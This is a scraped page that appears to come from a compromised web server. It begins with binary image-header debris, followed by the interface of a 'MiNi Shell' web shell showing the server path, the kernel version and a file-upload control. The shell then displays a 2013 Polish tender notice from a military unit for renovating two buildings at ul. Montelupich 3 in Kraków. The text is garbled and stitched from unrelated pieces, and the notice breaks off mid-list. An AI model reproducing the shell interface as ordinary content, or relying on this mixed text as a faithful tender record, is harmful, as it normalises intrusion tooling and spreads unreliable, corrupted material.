JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130828/347170-N-2013.html

<p class="kh_header"><b>Kraków: Roboty budowlane polegające na remoncie budynku nr 16 i 28 na terenie kompleksu wojskowego  przy ul. Montelupich 3 w Krakowie.</b><br>
<b>Numer ogłoszenia: 347170 - 2013; data zamieszczenia: 28.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3811 , Rząska, ul. Krakowska 2, 30-901 Kraków, woj. małopolskie, tel. +48 12 4555059; 4555116, faks +48 12 4555059, +48 12 4555103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.35wog.mil.pl/przetargi-rok/2013</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane polegające na remoncie budynku nr 16 i 28 na terenie kompleksu wojskowego  przy ul. Montelupich 3 w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont budynków nr 16, nr 28 w kompleksie wojskowym  
przy ul. Montelupich 3 w Krakowie.  
3.1.	Przedmiot zamówienia Zamawiający podzielił na dwie części.
3.1.1.	W skład remontu dla cześć nr 1 zamówienia Remont wybranych pomieszczeń 
w budynku nr 16 w kompleksie wojskowym przy ul. Montelupich 3 w Krakowie,  wchodzą:
Roboty w zakresie branży budowlanej:
wymiana stolarki okiennej wraz z parapetami oraz stolarki drzwiowej wewnętrznej        i zewnętrznej;
remont elewacji budynku;
roboty tynkarskie;
roboty malarskie ;
roboty posadzkarskie;
sucha zabudowa, ścianki działowe, zabudowa rur;
prace remontowe w łazience.

Roboty w zakresie branży sanitarnej:
wymianę wewnętrznej instalacji centralnego ogrzewania
przeróbki wewnętrznej instalacji c.o.
przeróbki węzła cieplnego w budynku
wywiezienie i utylizację gruzu
demontaż istniejących urządzeń sanitarnych
demontaż istniejących instalacji wod.-kan. 
roboty budowlane instalacyjne: przekucia otworów i murowanie bruzd
wywóz materiałów z rozbiórki
montaż nowej instalacji
wykonanie izolacji instalacji
wykonanie prób i odbiorów technicznych
montaż urządzeń sanitarnych z wykonaniem sprawdzenia prawidłowości działania

Roboty w zakresie branży elektrycznej:
montaż tablic rozdzielczych,
układanie przewodów,
montaż osprzętu i opraw oświetleniowych,
wykonanie pomiarów elektrycznych.

3.1.2.	W skład remontu dla część nr 2 zamówienia Remont wybranych pomieszczeń 
w budynku nr 28 w kompleksie wojskowym przy ul. Montelupich 3 w Krakowie, wchodzą:
Roboty w zakresie branży budowlanej:
wymiana stolarki drzwiowej wewnętrznej
roboty tynkarskie
roboty malarskie 
sucha zabudowa, zabudowa rur, ścianki systemowe
roboty posadzkarskie
instalowanie sufitów podwieszanych
Roboty w zakresie branży sanitarnej:
wymianę grzejników i zaworów
drobne przeróbki wewnętrznej instalacji c.o.,
wywiezienie i utylizację gruzu
wymianę białego montażu (baterie, umywalki, pisuary, ustępy, brodziki) wraz 
z osprzętem
montaż podtynkowych zestawów prysznicowych i liniowych odpływów prysznicowych

Roboty w zakresie branży elektrycznej:
wymianę gniazd wtyczkowych, wyłączników
wymianę oświetlenia żarowego na jarzeniowe
montaż wentylatora łazienkowego w kanale wentylacyjnym
wymianę tablicy rozdzielczej wraz z osprzętem
doprowadzenie z korytarza instalacji elektrycznej do pomieszczeń 01, 02   i 011 (2 gniazda wtykowe na każde pomieszczenie)
wywiezienie i utylizację gruzu.

Zakres robót zarówno dla części nr 1 i 2 obejmuje branżę budowlaną, sanitarną   i elektryczną.

3.2.	Szczegółowy zakres robót, został zawarty w Specyfikacji Technicznej Wykonania i Odbioru Robót zał. nr 15 do SIWZ oraz Przedmiarach robót dla poszczególnych części stanowiących zał. nr 14 do SIWZ.

3.3.	Istniejący stan obiektu i jego ocena:
Część nr 1: 
   Przedmiotowy budynek jest obiektem parterowym. Remontowi podlega część północna budynku. Stolarka drzwiowa w złym stanie. Należy wymienić na nowe wszystkie drzwi wewnętrzne oraz drzwi zewnętrzne prowadzące na strych. Istniejące okna drewniane nie spełniają należycie swojej funkcji. Należy zamontować nowe okna wykonane z PVC.  Kraty antywłamaniowe uznaje się za zbędne i przeznacza do demontażu. Istniejące wykończenia podłóg wskazują na znaczne ślady zużycia i kwalifikują się do całkowitego demontażu. Niezbędne jest również odświeżenie malatury poprzedzone zeskrobaniem starej farby i wykonaniem gładzi w celu wyrównania powierzchni ścian. Elewacja w niektórych miejscach jest dotkliwie uszkodzona. Wymaga uzupełnienia  i naprawy starych tynków i ponownego pomalowania. 
Wymianie podlegają również niektóre elementy instalacji wod.-kan. i centralnego ogrzewania.  Instalacja elektryczna kwalifikuje się do pilnego remontu.
	
Parametry techniczne budynku nr 16:
Kubatura: 			1 642 m3
Powierzchnia użytkowa:	   190 m2
Powierzchnia netto: 		   315 m2
Rok budowy:			1890
Rok naprawy:			1990
Funkcja budynku: 		warsztat

Część nr 2:
Należy zdemontować istniejące urządzenia sanitarne oraz grzejniki. Wymianie podlegają również niektóre elementy instalacji wodociągowej i kanalizacyjnej. Instalacja elektryczna kwalifikuje się do pilnego remontu. W łazience należy poprawić wentylację. 
Niezbędne jest również odświeżenie malatury po uprzednim przetarciu starych tynków. Pomieszczenia sanitarne  w złym stanie. Posadzki w niektórych miejscach kwalifikują się do całkowitej rozbiórki. Wskazana wymiana płytek ściennych i podłogowych. Stolarka drzwiowa wewnętrzna w stanie zużytym. Naprawa nieopłacalna, niezbędna wymiana. 

Parametry techniczne budynku nr 28:
Kubatura: 			15 180 m3
Powierzchnia użytkowa:	   2443 m2
Powierzchnia netto: 		   3341 m2
Rok budowy:			1964
Rok naprawy:			
Funkcja budynku: 		biurowo - sztabowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.10.00-4, 45.44.30.00-4, 45.41.00.00-4, 45.44.21.00-8, 45.43.10.00-7, 45.42.11.52-4, 45.45.30.00-7, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2, 45.31.00.00-3, 45.33.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część nr 1 - 5 000,00 zł (słownie: pięć tysięcy złotych);
Część nr 2 - 6 000,00 zł (słownie: sześć tysięcy złotych);</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)aktualnego na dzień składania ofert odpisu z właściwego rejestru, lub z centralnej ewidencji i informacji o działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru, lub ewidencji, w celu wykazania braku podstaw do wykluczenia 
w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną do wykonania zamówienia wiedzę i doświadczenie, do oferty należy dołączyć następujące dokumenty: 
a)	Zamawiający uzna, iż Wykonawca spełnia warunek udziału w postępowaniu jeśli wykaże, że dokonał  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
co najmniej:

Część nr 1:
- trzy  roboty budowlane polegające na remoncie lub budowie obiektu o kubaturze nie mniejszej niż 1 000 m3 w kwocie nie mniejszej niż 150 000 zł brutto każda, 
z podaniem nazwy przedmiotu zamówienia, daty wykonania, nazwy i adresu odbiorcy zamówienia oraz jej wartość (załącznik nr 10 do SIWZ).
Cześć nr 2:
-  trzy  roboty budowlane polegające na remoncie lub budowie obiektu o kubaturze nie mniejszej niż 1 000 m3 w kwocie nie mniejszej niż 150 000 zł brutto każda, 
z podaniem nazwy przedmiotu zamówienia, daty wykonania, nazwy i adresu odbiorcy zamówienia oraz jej wartość (załącznik nr 10 do SIWZ).

Do wykazu wykonanych robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (zał. nr  10  do SIWZ)  Wykonawca musi dołączyć dowody potwierdzające, że roboty  te zostały wykonane należycie oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Jeżeli Wykonawca nie jest w stanie uzyskać ww.  dowodów - inne dokumenty, które jednoznacznie wskazują, że wykazane roboty  (zał. nr  10  do SIWZ)  zostały wykonane w sposób należyty oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonych do oferty dokumentów, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający wymaga aby Wykonawca dysponował osobami zdolnymi do wykonania zamówienia, posiadającymi uprawnienia budowlane w każdej z niżej wymienionych specjalności:

Cześć nr 1:
konstrukcyjno-budowlanej - do kierowania robotami budowlanymi bez ograniczeń,
instalacyjnej w zakresie sanitarnym - do kierowania robotami budowlanymi,
instalacyjnej w zakresie elektrycznym - do kierowania robotami budowlanymi
Cześć nr 2:
konstrukcyjno-budowlanej - do kierowania robotami budowlanymi, 
instalacyjnej w zakresie sanitarnym - do kierowania robotami budowlanymi ,
instalacyjnej w zakresie elektrycznym - do kierowania robotami budowlanymi

Wykonawca w celu potwierdzenia, że jest w stanie zabezpieczyć wykonywanie przedmiotu zamówienia wykaże  w załączniku złożonym do oferty (załącznik nr 11 do SIWZ) personel posiadający wymagane przez Zamawiającego kwalifikacje;
b)	Wymóg posiadania ww. uprawnień zgodny jest z Rozporządzeniem Ministra Transportu   i Budownictwa z 28.04.2006 r. w sprawie samodzielnych funkcji technicznych   w budownictwie - Dz. U. 2006 nr 83 poz. 578 z późniejszymi zm. - Rozdział 4 §17.1).  
c)	Wykonawca do oferty może przedłożyć oświadczenia osób wskazanych 
w zał. nr 11 o posiadaniu przez nich wymaganych uprawnień lub inne dokumenty potwierdzające fakt posiadania ww. uprawnień.

Wykonawca zobowiązany jest do przedłożenia Zamawiającemu najpóźniej w dniu podpisania umowy oryginałów dokumentów lub kopii poświadczonych za zgodność z oryginałem, stwierdzających nadanie odpowiednich uprawnień  i  przynależność do izby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia powyższy warunek udziału w postępowaniu jeśli wykaże, że jego sytuacja ekonomiczna i finansowa pozwala na wykonanie zamówienia i będzie posiadał:
a)	aktualne zaświadczenie właściwego dla Wykonawcy Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zaświadczenie to ma być aktualne na dzień składania ofert.
b)	aktualne zaświadczenie właściwego dla Wykonawcy oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert. Zaświadczenie to ma być aktualne na dzień składania ofert.
c)	sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za ostatnie  2 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;
d)	informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia na kwotę:
Cześć nr 1: co najmniej 100 000,00 zł (sto tysięcy zł 00/100).
Cześć nr 2: co najmniej 120 000,00 zł (sto dwadzieścia tysięcy zł 00/100).

e)	opłaconą polisę ważną na dzień składania ofert, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na niżej wymienione kwoty dla:
część nr 1: co najmniej 300 000,00 zł ( trzysta tysięcy zł 00/100),
część nr 2 : co najmniej 300 000,00 zł ( trzysta tysięcy zł 00/100),
Uwaga: Ubezpieczenie w wysokości  600 000,00 zł ( sześćset tysięcy zł 00/100)  jest wystarczające do wykonania zarówno części nr 1 jak i części nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu potwierdzenia, że Wykonawca posiada niezbędną do wykonania zamówienia wiedzę i doświadczenie, do oferty należy dołączyć następujące dokumenty: 
a)	Zamawiający uzna, iż Wykonawca spełnia warunek udziału w postępowaniu jeśli wykaże, że dokonał  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
co najmniej:

Część nr 1:
- trzy  roboty budowlane polegające na remoncie lub budowie obiektu o kubaturze nie mniejszej niż 1 000 m3 w kwocie nie mniejszej niż 150 000 zł brutto każda, 
z podaniem nazwy przedmiotu zamówienia, daty wykonania, nazwy i adresu odbiorcy zamówienia oraz jej wartość (załącznik nr 10 do SIWZ).
Cześć nr 2:
-  trzy  roboty budowlane polegające na remoncie lub budowie obiektu o kubaturze nie mniejszej niż 1 000 m3 w kwocie nie mniejszej niż 150 000 zł brutto każda, 
z podaniem nazwy przedmiotu zamówienia, daty wykonania, nazwy i adresu odbiorcy zamówienia oraz jej wartość (załącznik nr 10 do SIWZ).

Do wykazu wykonanych robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (zał. nr  10  do SIWZ)  Wykonawca musi dołączyć dowody potwierdzające, że roboty  te zostały wykonane należycie oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Jeżeli Wykonawca nie jest w stanie uzyskać ww.  dowodów - inne dokumenty, które jednoznacznie wskazują, że wykazane roboty  (zał. nr  10  do SIWZ)  zostały wykonane w sposób należyty oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonych do oferty dokumentów, metodą spełnia/nie spełnia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 2 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku podmiotów niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 2 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>c)	sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za ostatnie  2 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;
d)	informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia na kwotę:
Cześć nr 1: co najmniej 100 000,00 zł (sto tysięcy zł 00/100).
Cześć nr 2: co najmniej 120 000,00 zł (sto dwadzieścia tysięcy zł 00/100).

e)	opłaconą polisę ważną na dzień składania ofert, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na niżej wymienione kwoty dla:
część nr 1: co najmniej 300 000,00 zł ( trzysta tysięcy zł 00/100),
część nr 2 : co najmniej 300 000,00 zł ( trzysta tysięcy zł 00/100),
Uwaga: Ubezpieczenie w wysokości  600 000,00 zł ( sześćset tysięcy zł 00/100)  jest wystarczające do wykonania zarówno części nr 1 jak i części nr 2.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

